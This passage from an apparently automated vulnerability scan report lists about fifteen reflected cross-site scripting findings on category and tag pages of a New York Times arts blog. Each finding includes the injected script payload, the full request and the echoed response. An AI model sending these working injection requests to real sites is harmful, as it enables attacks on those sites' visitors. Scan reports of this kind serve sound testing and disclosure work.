HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:30 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/arts-generalf70f0\"><script>alert(1)</script>c5a9dd137e4&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.40. http://artsbeat.blogs.nytimes.com/category/books/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/category/books/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2af69"><script>alert(1)</script>bb647269876 was submitted in the REST URL parameter 2. This input was echoed as 2af69\"><script>alert(1)</script>bb647269876 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/books2af69"><script>alert(1)</script>bb647269876/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:18 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/books2af69\"><script>alert(1)</script>bb647269876&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.41. http://artsbeat.blogs.nytimes.com/category/classical-music/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/category/classical-music/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddd77"><script>alert(1)</script>6d4e36739ac was submitted in the REST URL parameter 2. This input was echoed as ddd77\"><script>alert(1)</script>6d4e36739ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/classical-musicddd77"><script>alert(1)</script>6d4e36739ac/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:07 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58436
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/classical-musicddd77\"><script>alert(1)</script>6d4e36739ac&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.42. http://artsbeat.blogs.nytimes.com/category/dance/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/category/dance/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad0f7"><script>alert(1)</script>7745ad10317 was submitted in the REST URL parameter 2. This input was echoed as ad0f7\"><script>alert(1)</script>7745ad10317 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/dancead0f7"><script>alert(1)</script>7745ad10317/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:10 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/dancead0f7\"><script>alert(1)</script>7745ad10317&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.43. http://artsbeat.blogs.nytimes.com/category/featured/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/category/featured/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e4f4"><script>alert(1)</script>618049fbd12 was submitted in the REST URL parameter 2. This input was echoed as 8e4f4\"><script>alert(1)</script>618049fbd12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/featured8e4f4"><script>alert(1)</script>618049fbd12/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:30 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58345
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/featured8e4f4\"><script>alert(1)</script>618049fbd12&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.44. http://artsbeat.blogs.nytimes.com/category/movies/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/category/movies/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d062"><script>alert(1)</script>621d42481fe was submitted in the REST URL parameter 2. This input was echoed as 8d062\"><script>alert(1)</script>621d42481fe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/movies8d062"><script>alert(1)</script>621d42481fe/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:06 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58319
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/movies8d062\"><script>alert(1)</script>621d42481fe&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.45. http://artsbeat.blogs.nytimes.com/category/music/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/category/music/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0781"><script>alert(1)</script>63dd7b81cef was submitted in the REST URL parameter 2. This input was echoed as f0781\"><script>alert(1)</script>63dd7b81cef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/musicf0781"><script>alert(1)</script>63dd7b81cef/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:15 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:16 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/musicf0781\"><script>alert(1)</script>63dd7b81cef&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.46. http://artsbeat.blogs.nytimes.com/category/new-york-city/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/category/new-york-city/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78201"><script>alert(1)</script>9bba86db8b1 was submitted in the REST URL parameter 2. This input was echoed as 78201\"><script>alert(1)</script>9bba86db8b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/new-york-city78201"><script>alert(1)</script>9bba86db8b1/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:25 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/new-york-city78201\"><script>alert(1)</script>9bba86db8b1&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.47. http://artsbeat.blogs.nytimes.com/category/television/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/category/television/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ca6e"><script>alert(1)</script>e1cf7713b07 was submitted in the REST URL parameter 2. This input was echoed as 6ca6e\"><script>alert(1)</script>e1cf7713b07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/television6ca6e"><script>alert(1)</script>e1cf7713b07/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:20 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:20 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/television6ca6e\"><script>alert(1)</script>e1cf7713b07&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.48. http://artsbeat.blogs.nytimes.com/category/theater/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/category/theater/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8370"><script>alert(1)</script>08e1b6da719 was submitted in the REST URL parameter 2. This input was echoed as f8370\"><script>alert(1)</script>08e1b6da719 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /category/theaterf8370"><script>alert(1)</script>08e1b6da719/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:22 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58332
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/category/theaterf8370\"><script>alert(1)</script>08e1b6da719&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.49. http://artsbeat.blogs.nytimes.com/tag/amc/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/amc/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43f1c"><script>alert(1)</script>41d4afcb6d4 was submitted in the REST URL parameter 2. This input was echoed as 43f1c\"><script>alert(1)</script>41d4afcb6d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/amc43f1c"><script>alert(1)</script>41d4afcb6d4/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:43 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58215
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/amc43f1c\"><script>alert(1)</script>41d4afcb6d4&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.50. http://artsbeat.blogs.nytimes.com/tag/anatomy-of-a-scene/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/anatomy-of-a-scene/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7e99"><script>alert(1)</script>6201528606d was submitted in the REST URL parameter 2. This input was echoed as e7e99\"><script>alert(1)</script>6201528606d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/anatomy-of-a-scenee7e99"><script>alert(1)</script>6201528606d/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:14 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:14 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58410
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/anatomy-of-a-scenee7e99\"><script>alert(1)</script>6201528606d&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.51. http://artsbeat.blogs.nytimes.com/tag/chris-pine/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/chris-pine/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ef3a"><script>alert(1)</script>8b298f2fb19 was submitted in the REST URL parameter 2. This input was echoed as 4ef3a\"><script>alert(1)</script>8b298f2fb19 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/chris-pine4ef3a"><script>alert(1)</script>8b298f2fb19/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:25 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58306
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/chris-pine4ef3a\"><script>alert(1)</script>8b298f2fb19&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.52. http://artsbeat.blogs.nytimes.com/tag/denzel-washington/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/denzel-washington/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69bb6"><script>alert(1)</script>38050bcc525 was submitted in the REST URL parameter 2. This input was echoed as 69bb6\"><script>alert(1)</script>38050bcc525 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/denzel-washington69bb6"><script>alert(1)</script>38050bcc525/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:20 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:20 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/denzel-washington69bb6\"><script>alert(1)</script>38050bcc525&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.53. http://artsbeat.blogs.nytimes.com/tag/hip-hop/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/hip-hop/ |
Issue detail
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e7b7"><script>alert(1)</script>58c4fa3e928 was submitted in the REST URL parameter 2. This input was echoed as 1e7b7\"><script>alert(1)</script>58c4fa3e928 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/hip-hop1e7b7"><script>alert(1)</script>58c4fa3e928/ HTTP/1.1 Host: artsbeat.blogs.nytimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
|
Response
HTTP/1.1 404 Not Found Date: Sat, 13 Nov 2010 01:56:53 GMT Server: Apache X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://artsbeat.blogs.nytimes.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sat, 13 Nov 2010 01:56:53 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 58267
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gm ...[SNIP]... <script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/artsbeat/tag/hip-hop1e7b7\"><script>alert(1)</script>58c4fa3e928&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr ...[SNIP]...
|
3.54. http://artsbeat.blogs.nytimes.com/tag/james-levine/ [REST URL parameter 2]
previous
next
Summary
Severity: |
High |
Confidence: |
Certain |
Host: |
http://artsbeat.blogs.nytimes.com |
Path: |
/tag/james-levine/ |
Issue detail
